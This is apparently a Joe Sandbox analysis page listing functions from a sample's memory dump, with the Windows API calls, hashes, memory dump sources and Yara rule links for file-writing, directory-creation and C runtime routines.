Opcode ID: c4360dc537fe6ff244bd292fb30abe902d29c71b919dc1d7b67018cc26bd530d
Instruction ID: ec194f34420ebf87da73f9c0d3b8aaeb69c81000eb3256962267be7963c3e488
Opcode Fuzzy Hash: c4360dc537fe6ff244bd292fb30abe902d29c71b919dc1d7b67018cc26bd530d
Instruction Fuzzy Hash: 7011A370A102449BDF24FB749C06BFD73A9EF45314F008169BC5DE7192DB758A41B651

Function 00C7218A Relevance: 4.6, APIs: 3, Instructions: 96fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5), ref: 00C721A5
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C721E5
WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00C72212

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 65cb377a3867284298ce192bee47883443a340db226ead4d61a5341e63c9eb1f
Instruction ID: 11219df2cd911613e2d10f81beae37ef3315d851a7a131e6c7ffc8cb01db8163
Opcode Fuzzy Hash: 65cb377a3867284298ce192bee47883443a340db226ead4d61a5341e63c9eb1f
Instruction Fuzzy Hash: EB310971548206AFDB209E24DC08FAAFBA8FB91310F04C619F6A9931D1C775ED59CBE1

Function 00C72480 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?), ref: 00C724A7
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?), ref: 00C724DA
GetLastError.KERNEL32(?,?), ref: 00C724F7

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: eb4d50e7a82093cbe72408666bb07cd6f4cc90d41fc2ef17c7f887b438bbebcb
Instruction ID: bdb4d7619e1807776ecefd26af60ce5d4d7c83b0caad398519f7dc52625ca6ee
Opcode Fuzzy Hash: eb4d50e7a82093cbe72408666bb07cd6f4cc90d41fc2ef17c7f887b438bbebcb
Instruction Fuzzy Hash: 3301F73110025466DB726B744C49BFE735CAF0A781F08C442FD5ED6091DB68CB80E7A1

Function 00C8D12F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00C8D154

Strings

, xrefs: 00C8D199

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 6e63c4a8f8deeb3148b81b57e5975baed1dc47d8ad3ea33518651f6e5ae84a78
Instruction ID: 11e95f136b3ba9c9912c8e5aeae1e928cb8a2fa676751d677a3692a508ed18dd
Opcode Fuzzy Hash: 6e63c4a8f8deeb3148b81b57e5975baed1dc47d8ad3ea33518651f6e5ae84a78
Instruction Fuzzy Hash: 91411970504348AADF21AE658C84BFABBBAEF4530CF1404EDE59B87182D235AE45DF24

Function 00C7E0AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00C76FC5: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,?,00000000,?,00C72BD8,?,?,00000000,?,?,?), ref: 00C77017

Part of subcall function 00C7DF59: SetCurrentDirectoryW.KERNELBASE(?,00C7E0EE,C:\Users\user\Desktop,00000000,00CB9732,00000006), ref: 00C7DF5D

SHFileOperationW.SHELL32(?,?,?,?,?,00CB9732,00000006), ref: 00C7E140

Strings

C:\Users\user\Desktop, xrefs: 00C7E0E4

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CompareCurrentDirectoryFileOperationString
String ID: C:\Users\user\Desktop
API String ID: 3543741193-1246513382
Opcode ID: f5079f88d997b131798f8b56d8185f67dcdff06b1b4afb06c312caa7a13af807
Instruction ID: 8faf6baac37d630e884ef3ea5cd7534f1345ec3071331363bde5e9d1a89880bf
Opcode Fuzzy Hash: f5079f88d997b131798f8b56d8185f67dcdff06b1b4afb06c312caa7a13af807
Instruction Fuzzy Hash: E3017171D1021866DB21ABA4DC4AFEF73FCEF08344F004466F609E3191EAB496859BE5

Function 00C8C875 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,91E85006,00000001,?,000000FF), ref: 00C8C8E6

Strings

LCMapStringEx, xrefs: 00C8C886, 00C8C890

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 9b9568a2eeebc440c34147d3753d1cd7e741267eecbb693561c72e1210e8a740
Instruction ID: ea15c9942375e08312016912faa386a03097ab5445c80382f966e48de7421bdc
Opcode Fuzzy Hash: 9b9568a2eeebc440c34147d3753d1cd7e741267eecbb693561c72e1210e8a740
Instruction Fuzzy Hash: 3E01E932540209FBCF026F90DC05EEF3F66EF49764F014125FE1966161CA729975EB94

Function 00C8C813 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00C8BE9D), ref: 00C8C85E

Strings

InitializeCriticalSectionEx, xrefs: 00C8C82E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 9c41193da944deee040b6a11414b4a61230789f8e1e45005e6d4c7b56050c9d2
Instruction ID: 31214a541de893f23b51c8a5911190f345548f955d5edc393b968c5f4ee404f3
Opcode Fuzzy Hash: 9c41193da944deee040b6a11414b4a61230789f8e1e45005e6d4c7b56050c9d2
Instruction Fuzzy Hash: 7EF0B431680218BBCF016F51DC0DEAE7F61EF44724B004039FD195A1A0CE724E21A794

Function 00C8C6B8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00C8C6F7

Strings

FlsAlloc, xrefs: 00C8C6D3

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 615073e5eb2bf6f33467f2368582fe23a632e187ce983f1d12ab469befa5e4b3
Instruction ID: 4c041b10f74ddc16fc69e08156f041b51b03c45bdc752123fffb39af9f274cec
Opcode Fuzzy Hash: 615073e5eb2bf6f33467f2368582fe23a632e187ce983f1d12ab469befa5e4b3
Instruction Fuzzy Hash: ABE02B31661618A78B01BF519C1EB6E7B99DF48721F000179FC0967290DDB16E0197ED

Function 00C8698A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00C8699F

Strings

FlsAlloc, xrefs: 00C8698E, 00C86998

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 828e6e0ea65399fc51a202076799631b37d8dbf2f3dc5bad69243fa212687a57
Instruction ID: 79d85d90dc2622c1ad8850494e50c49063d41dbead377d6c5e0fd3c72b426e8f
Opcode Fuzzy Hash: 828e6e0ea65399fc51a202076799631b37d8dbf2f3dc5bad69243fa212687a57
Instruction Fuzzy Hash: 89D05E32B81638B2991132D66C0BBADBE44CB00FF6F040072FF0C692C2D5A2591063ED

Function 00C81B45 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C81B57

Part of subcall function 00C818A5: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C81922
Part of subcall function 00C818A5: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C81933

Strings

3So, xrefs: 00C81B45, 00C81B51

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3So
API String ID: 1269201914-1105799393
Opcode ID: cad356be7067ac68f0be743a2854d9ad24f233e6081160ba41066ac7b201621b
Instruction ID: 94fe88e10cf790d118265f95d03457832776389938a4e4003b60b7afb7afd131
Opcode Fuzzy Hash: cad356be7067ac68f0be743a2854d9ad24f233e6081160ba41066ac7b201621b
Instruction Fuzzy Hash: 51B012D2298201BF3904310E6C4BC3B119DC2E0F14334813FF801C40C0A4401C83213A

Function 00C8D484 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00C8D057: GetOEMCP.KERNEL32(00000000,?,?,00C8D2E0,?), ref: 00C8D082

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C8D325,?,00000000), ref: 00C8D4F8
GetCPInfo.KERNEL32(00000000,00C8D325,?,?,?,00C8D325,?,00000000), ref: 00C8D50B

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: d58ac43f37128dda54beb14edff7393db153122674f7dcef6fc1ebbc2d47f4cf
Instruction ID: 5a13b4d1d19d907bc4ba71dc958a2a5e59412288ac665852ea79e9f3ce72670e
Opcode Fuzzy Hash: d58ac43f37128dda54beb14edff7393db153122674f7dcef6fc1ebbc2d47f4cf
Instruction Fuzzy Hash: 785134B09002059EDB20AF76C845BBBBBE5AF4130CF14446FE06B8B1D1E7349A46DB98

Function 00C8D2C3 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00C8B122: GetLastError.KERNEL32(?,?,00C872DC,?,00000000,?,00C86E7B,00000200,00000000,?), ref: 00C8B126
Part of subcall function 00C8B122: _free.LIBCMT ref: 00C8B159
Part of subcall function 00C8B122: SetLastError.KERNEL32(00000000,00000000,?), ref: 00C8B19A
Part of subcall function 00C8B122: _abort.LIBCMT ref: 00C8B1A0

Part of subcall function 00C8D3E2: _abort.LIBCMT ref: 00C8D414
Part of subcall function 00C8D3E2: _free.LIBCMT ref: 00C8D448

Part of subcall function 00C8D057: GetOEMCP.KERNEL32(00000000,?,?,00C8D2E0,?), ref: 00C8D082

_free.LIBCMT ref: 00C8D33B
_free.LIBCMT ref: 00C8D371

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: c094816de6121db062d9a7c83a7c4a4bc2e8917b0e14a21db5e4a585b4da2754
Instruction ID: 262817111c73a137c2b21363fedc3461ed90c199128de156028701f8bd75cd37
Opcode Fuzzy Hash: c094816de6121db062d9a7c83a7c4a4bc2e8917b0e14a21db5e4a585b4da2754
Instruction Fuzzy Hash: 2331E231900204AFDB10FFA9D941BADB7F5EF4132CF2100AAE8159B2E1EB319E41DB59

Function 00C71B41 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?), ref: 00C71BC9
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800), ref: 00C71BFE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 606f73a5c798c100700314c0244235022297eb2086a598d599c9bf872974c17d
Instruction ID: fb4b10dafe27f5764a3b2ab0785eb89f9a3b7e974bfd526f1afbe75a396ea008
Opcode Fuzzy Hash: 606f73a5c798c100700314c0244235022297eb2086a598d599c9bf872974c17d
Instruction Fuzzy Hash: 522107B1404748AFD7308F28CC85FAB7BE8FB09764F048A1DF9E9821D1D274AD499B61

Function 00C72022 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 00C7203C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00C720EC

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 0150cc466112a12fc442179221fd16adeaa1d3995a7512996acdba5e8ab38512
Instruction ID: c8e30580c6dde1bdd6ea5bda3e617e1cfc72acca7b7229530898941c97367db3
Opcode Fuzzy Hash: 0150cc466112a12fc442179221fd16adeaa1d3995a7512996acdba5e8ab38512
Instruction Fuzzy Hash: 3D21F331248285AFC710DE35C885EABBBE4AF65304F04891DF8E987151C729EE4CDBA2

Function 00C8C5A1 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8C601
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C8C60E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 4e04a8055f8289dbc6d8d23000b7b172a2e3c2cb14fc2f171927a9a151f22e04
Instruction ID: f5f6bd9fae60f4bcbb30cc10fef99e7715fabc15d12efa19cd8b3b05c8853f44
Opcode Fuzzy Hash: 4e04a8055f8289dbc6d8d23000b7b172a2e3c2cb14fc2f171927a9a151f22e04
Instruction Fuzzy Hash: E5113D33A006205F8F21AF29EC8065E73959B843247160235FD24EB254DA30ED0297E8

Function 00C720FB Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00C72131
GetLastError.KERNEL32 ref: 00C7213D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b0846405ee0182017faf69ec3d268d552d35178ef0ddb76d1182e33bdbaf9e3b
Instruction ID: 10c5b964cedb22f72a10d54dabf808295987dff0d9db2126bd301fd8a72b15d7
Opcode Fuzzy Hash: b0846405ee0182017faf69ec3d268d552d35178ef0ddb76d1182e33bdbaf9e3b
Instruction Fuzzy Hash: 2A019270701340ABDB349E29DC48B6FB6E9AB84314F95863EB26AC76C0CA31DD0CC721

Function 00C71EA7 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 00C71EFB
GetLastError.KERNEL32 ref: 00C71F08

Part of subcall function 00C71CFA: __EH_prolog.LIBCMT ref: 00C71CFF

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: 3329ab089bee77edb60da4e5ebce1820b1fb0e8eaf8b094557dad616319b20d4
Instruction ID: f3082b0c703ef56f0569f1ebd1f2f3b5e8d3c80403f6c7554828d0f5b0141459
Opcode Fuzzy Hash: 3329ab089bee77edb60da4e5ebce1820b1fb0e8eaf8b094557dad616319b20d4
Instruction Fuzzy Hash: 6601B532600205DB9B188EAD9C58AAA775DAF9173030CC229FC3A8B291C770DD0597A0

Function 00C8C080 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8C0A1

Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A

HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,00C8D871,?,00000004,00000000,?,?,?,00C8A0D6,?,00000000), ref: 00C8C0DD

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 3d54aebfe0ebaf09ea26d41923ccf7e4fe9f8173af0ae50eddec86005c1dad57
Instruction ID: 73b6ab7edb3defd7ee02873f5ccc3566b3a3d4e7717c0e395bd4c32d0d73bcc5
